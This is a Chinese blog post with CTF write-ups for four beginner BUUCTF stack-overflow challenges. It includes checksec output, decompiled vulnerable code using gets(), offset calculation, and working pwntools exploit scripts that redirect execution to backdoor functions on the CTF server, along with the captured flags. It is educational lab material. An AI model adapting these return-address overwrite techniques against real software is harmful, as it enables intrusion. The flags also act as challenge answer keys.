

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Gh0stF0xy">
  <meta name="keywords" content="">
  
    <meta name="description" content="重新开始刷BUU，补一补基础。 test_your_nc下载附件，查看源代码 12345int __fastcall main(int argc, const char **argv, const char **envp)&#123;  system(&quot;&#x2F;bin&#x2F;sh&quot;);  return 0;&#125;  直接给了shell，看来nc一下就行了 1nc node5.buuo">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF题解">
<meta property="og:url" content="https://www.ghostfoxy.cn/2025/11/14/buuwp1/index.html">
<meta property="og:site_name" content="GhostFoxy&#39;s 网安世界">
<meta property="og:description" content="重新开始刷BUU，补一补基础。 test_your_nc下载附件，查看源代码 12345int __fastcall main(int argc, const char **argv, const char **envp)&#123;  system(&quot;&#x2F;bin&#x2F;sh&quot;);  return 0;&#125;  直接给了shell，看来nc一下就行了 1nc node5.buuo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.ghostfoxy.cn/banner/2.png">
<meta property="article:published_time" content="2025-11-14T11:17:04.000Z">
<meta property="article:modified_time" content="2025-11-16T16:11:47.207Z">
<meta property="article:author" content="Gh0stF0xy">
<meta property="article:tag" content="pwn 题解 write-ups">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://www.ghostfoxy.cn/banner/2.png">
  
  
  
  <title>BUUCTF题解 - GhostFoxy&#39;s 网安世界</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">
<link rel="stylesheet" href="/css/scrollAnimation.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.ghostfoxy.cn","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>GhostFoxy&#39;s 网安世界</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/wallpaper.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="BUUCTF题解"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-11-14 19:17" pubdate>
          2025年11月14日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">BUUCTF题解</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2025-11-17T00:11:47+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <p>重新开始刷BUU，补一补基础。</p>
<h3 id="test-your-nc"><a href="#test-your-nc" class="headerlink" title="test_your_nc"></a>test_your_nc</h3><p>下载附件，查看源代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>直接给了shell，看来nc一下就行了</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">nc node5.buuoj.cn 26919<br></code></pre></td></tr></table></figure>

<p>最基础的命令执行：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">cat</span> flag</span><br>flag&#123;cfbd975d-6f29-463d-bdd8-79c2f774575c&#125;<br></code></pre></td></tr></table></figure>

<p>成功获取flag。</p>
<h3 id="rip"><a href="#rip" class="headerlink" title="rip"></a>rip</h3><p>checksec一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">Arch:       amd64-64-little <span class="hljs-comment"># 64位程序</span><br>  RELRO:      Partial RELRO <span class="hljs-comment"># 部分RELRO，用于防止got表被篡改，full relro时，got表被设置为只读</span><br>  Stack:      No canary found <span class="hljs-comment"># 金丝雀，防止栈溢出攻击，这里关闭了</span><br>  NX:         NX unknown - GNU_STACK missing <span class="hljs-comment"># 栈，堆等内存区域不可执行，防止被注入shellcode，这里关闭</span><br>  PIE:        No PIE (0x400000) <span class="hljs-comment"># 地址空间随机化，开启后攻击者很难找到硬编码地址，从而需要用ROP链等攻击手段，这里关闭</span><br>  Stack:      Executable <span class="hljs-comment"># 栈可执行</span><br>  RWX:        Has RWX segments <span class="hljs-comment"># Read Write Execute 可读可写可执行三大权限</span><br>  Stripped:   No <span class="hljs-comment"># 剥离，移除调试符号信息，使文件更小，同时更难被逆向</span><br></code></pre></td></tr></table></figure>

<p>打开ida查看源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  <span class="hljs-type">char</span> s[<span class="hljs-number">15</span>]; <span class="hljs-comment">// [rsp+1h] [rbp-Fh] BYREF</span><br>	<span class="hljs-comment">//注释中标注了s数组的大小和位置：长为15，距离栈底15</span><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;please input&quot;</span>); <span class="hljs-comment">//输入提示</span><br>  gets(s, argv); <span class="hljs-comment">//危险函数gets()：由于不检查输入字符串的长度，再加上没有金丝雀保护，说明可以执行栈溢出</span><br>  <span class="hljs-built_in">puts</span>(s);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;ok,bye!!!&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在函数列表里发现了一个疑似后门函数fun()：</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>fun()的代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">fun</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<span class="hljs-comment">//直接给了shell</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>由程序分析可得这是个64位程序的栈溢出攻击题。由于rbp后一般存放着返回地址，我们可以通过栈溢出将缓冲区和rbp覆盖后篡改返回地址，使其执行fun函数从而拿到shell</p>
<p>一般来说64位的程序的寄存器占8字节，所以偏移长度为：15+8&#x3D;23.</p>
<p>不确定，验证一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">chmod</span> +x pwn1 <span class="hljs-comment"># 赋予源文件可执行权限</span></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">gdb ./pwn1 <span class="hljs-comment"># gdb调试程序</span></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">run <span class="hljs-comment">#执行程序</span></span><br></code></pre></td></tr></table></figure>

<p>弹出输入提示信息：</p>
<p>另立一个终端，构造溢出链：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">cyclic 100 #生成长度为100的字符串<br>aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa<br></code></pre></td></tr></table></figure>

<p>将字符串输入调试平台：</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>此时我们得到了溢出地址：0x6161686161616761</p>
<p>验证偏移：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">cyclic -l 0x6161686161616761<br>23<br></code></pre></td></tr></table></figure>

<p>可以看到输出了23，验证完成，计算是正确的，偏移就是23，说明我们填充23长度的数据后，后面就是返回地址了，我们需要返回fun函数的地址。如何知道fun函数的地址呢？</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">pwndbg&gt; </span><span class="language-bash">p &amp;fun</span><br><span class="hljs-meta prompt_">$</span><span class="language-bash">1 = (&lt;text variable, no debug info&gt; *) 0x401186 &lt;fun&gt;</span><br></code></pre></td></tr></table></figure>

<p>gdb里通过p指令查找到fun函数的地址为：0x401186</p>
<p>既然如此我们可以开始构造攻击脚本了。</p>
<p>打开vim界面编写：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">vim exp.py<br></code></pre></td></tr></table></figure>

<p>按i进入编辑模式</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> * <span class="hljs-comment"># 导入pwntools库</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26268</span>) <span class="hljs-comment"># 建立远程流</span><br>offset = <span class="hljs-number">23</span> <span class="hljs-comment">#偏移为23</span><br>fun_addr = <span class="hljs-number">0x401186</span> <span class="hljs-comment">#fun函数的地址</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(<span class="hljs-number">0x401186</span>) <span class="hljs-comment">#b和p64都是将字符串片段转换为小端序格式</span><br>p.sendline(payload) <span class="hljs-comment"># 发送payload到待攻击的服务端</span><br>p.interactive() <span class="hljs-comment">#打开交互界面</span><br></code></pre></td></tr></table></figure>

<p>esc退出编辑模式，输入:wq!保存</p>
<p>执行代码：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">python3 exp.py<br></code></pre></td></tr></table></figure>

<p>发现没打通：</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>什么原因呢？大概率是我们没有做到堆栈平衡。堆栈平衡的概念我会在后面的博客里讲到。简单来说就是要保证payload代码片段长度是16的倍数，所以我们需要再加一个8字节长度的片段。一般使用ret片段。</p>
<p>一般在ida的汇编界面可以找到ret片段，这里用一个更优雅的方法：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash">ROPgadget --binary rip --only <span class="hljs-string">&quot;ret&quot;</span></span><br>Gadgets information<br>============================================================<br>0x0000000000401016 : ret<br><br>Unique gadgets found: 1<br></code></pre></td></tr></table></figure>

<p>找到了，ret片段的地址为0x401016</p>
<p>重新编写exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> * <span class="hljs-comment"># 导入pwntools库</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26268</span>) <span class="hljs-comment"># 建立远程流</span><br>offset = <span class="hljs-number">23</span> <span class="hljs-comment">#偏移为23</span><br>fun_addr = <span class="hljs-number">0x401186</span> <span class="hljs-comment">#fun函数的地址</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(<span class="hljs-number">0x401016</span>) + p64(<span class="hljs-number">0x401186</span>)  <span class="hljs-comment">#b和p64都是将字符串片段转换为小端序格式</span><br>p.sendline(payload) <span class="hljs-comment"># 发送payload到待攻击的服务端</span><br>p.interactive() <span class="hljs-comment">#打开交互界面</span><br></code></pre></td></tr></table></figure>

<p>再次执行，成功获取到了shell。</p>
<h3 id="warmup-csaw-2016"><a href="#warmup-csaw-2016" class="headerlink" title="warmup_csaw_2016"></a>warmup_csaw_2016</h3><p>拿到程序先checksec一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little <br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX unknown - GNU_STACK missing<br>  PIE:        No PIE (0x400000)<br>  Stack:      Executable<br>  RWX:        Has RWX segments<br></code></pre></td></tr></table></figure>

<p>可以看到没有金丝雀保护，栈可执行，64位程序。</p>
<p>IDA查看源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs C">__int64 __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> a1, <span class="hljs-type">char</span> **a2, <span class="hljs-type">char</span> **a3)</span><br>&#123;<br>  <span class="hljs-type">char</span> s[<span class="hljs-number">64</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-80h] BYREF</span><br>  _BYTE v5[<span class="hljs-number">64</span>]; <span class="hljs-comment">// [rsp+40h] [rbp-40h] BYREF</span><br><br>  write(<span class="hljs-number">1</span>, <span class="hljs-string">&quot;-Warm Up-\n&quot;</span>, <span class="hljs-number">0xAu</span>LL);<br>  write(<span class="hljs-number">1</span>, <span class="hljs-string">&quot;WOW:&quot;</span>, <span class="hljs-number">4uLL</span>);<br>  <span class="hljs-built_in">sprintf</span>(s, <span class="hljs-string">&quot;%p\n&quot;</span>, sub_40060D);<br>  <span class="hljs-comment">//sprintf是C标准库中的一个格式化输出函数，其原型为 int sprintf(char *str, const char *format, ...)。它的作用是将格式化后的数据写入一个字符串缓冲区（即 str指向的内存），而不是像 printf那样直接输出到屏幕</span><br>  write(<span class="hljs-number">1</span>, s, <span class="hljs-number">9uLL</span>);<br>  write(<span class="hljs-number">1</span>, <span class="hljs-string">&quot;&gt;&quot;</span>, <span class="hljs-number">1uLL</span>);<br>  <span class="hljs-keyword">return</span> gets(v5); <span class="hljs-comment">//栈溢出的标志：危险函数gets()</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>由于写入数据的方向跟入栈后栈的增长方向的方向是<strong>相反的</strong>，所以能覆盖rbp以及后面的数据引发栈溢出。</p>
<p>后门函数sub_40060D：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">sub_40060D</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;cat flag.txt&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>利用栈溢出转到该函数的地址上。</p>
<p>在ida中查看反编译，可以看到地址是0x40060d</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>cyclic查找偏移：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">ghostfoxy@ghostfoxy:~/CTF$ cyclic -l 0x6161617461616173<br>72<br></code></pre></td></tr></table></figure>

<p>偏移量和后门地址都到手了，可以开始写exp了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26088</span>)<br>offset = <span class="hljs-number">72</span><br>sub40060d = <span class="hljs-number">0x40060d</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(sub40060d)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>成功打通拿到flag</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<h3 id="ciscn-2019-n-1"><a href="#ciscn-2019-n-1" class="headerlink" title="ciscn_2019_n_1"></a>ciscn_2019_n_1</h3><p>看一下程序的保护：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>  RELRO:      Partial RELRO<br>  Stack:      No canary found<br>  NX:         NX enabled #NX开启，无法使用shellcode<br>  PIE:        No PIE (0x400000)<br>  Stripped:   No<br></code></pre></td></tr></table></figure>

<p>看一下主程序：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">func</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE v1[<span class="hljs-number">44</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-30h] BYREF</span><br>  <span class="hljs-type">float</span> v2; <span class="hljs-comment">// [rsp+2Ch] [rbp-4h]</span><br><br>  v2 = <span class="hljs-number">0.0</span>;<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Let&#x27;s guess the number.&quot;</span>);<br>  gets(v1);<span class="hljs-comment">//漏洞点</span><br>  <span class="hljs-keyword">if</span> ( v2 == <span class="hljs-number">11.28125</span> )<br>    <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;cat /flag&quot;</span>);<span class="hljs-comment">//1</span><br>  <span class="hljs-keyword">else</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Its value should be 11.28125&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到依旧gets危险函数，依旧是栈溢出。</p>
<p>这里有两个思路，一个是v1溢出覆盖v2为11.28125，另一种是直接将返回地址覆盖为1处的.text段地址。</p>
<p>**思路1：**覆盖v2</p>
<p>v1的”入口”在rbp-30h的地址上作为起点，v2的起始地址是rbp-4h</p>
<p>偏移量为48-4&#x3D;44</p>
<p>所以要填充44长度的垃圾数据后篡改v2的值</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>查看汇编代码，发现有ucomiss的比较语句，将v2的值和变量dword_4007F4进行比较，可以知道这个dword就是11.28125</p>
<p>双击查看十六进制的形式，可知是0x41348000</p>
<p>从而构造exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26545</span>)<br>offset = <span class="hljs-number">0x30</span> - <span class="hljs-number">0x4</span><br>value = <span class="hljs-number">0x41348000</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(value)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序后，输出结果，拿到flag</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs shell">[+] Opening connection to node5.buuoj.cn on port 26545: Done<br>[DEBUG] Sent 0x35 bytes:<br>    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│<br>    *<br>    00000020  61 61 61 61  61 61 61 61  61 61 61 61  00 80 34 41  │aaaa│aaaa│aaaa│··4A│<br>    00000030  00 00 00 00  0a                                     │····│·│<br>    00000035<br>[*] Switching to interactive mode<br>[DEBUG] Received 0x17 bytes:<br>    b&quot;Let&#x27;s guess the number.&quot;<br>Let&#x27;s guess the number.[DEBUG] Received 0x2c bytes:<br>    b&#x27;\n&#x27;<br>    b&#x27;flag&#123;8f0b4e7a-10a6-4706-870e-78563a885f32&#125;\n&#x27;<br><br>flag&#123;8f0b4e7a-10a6-4706-870e-78563a885f32&#125;<br>[*] Got EOF while reading in interactive<br></code></pre></td></tr></table></figure>

<p>**思路2：**跳转system的地址执行system(“cat &#x2F;flag”)</p>
<p><img src="/Users/jonathanlfz/myblog/source/img/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>由汇编可知，system(“cat &#x2F;flag”)这条指令的地址是0x4006BE</p>
<p>覆盖v1 v2和rbp之后，将返回地址覆盖为0x4006BE</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26545</span>)<br>offset = <span class="hljs-number">0x30</span> + <span class="hljs-number">0x8</span><br>system_addr = <span class="hljs-number">0x4006BE</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(system_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行代码可得到flag</p>
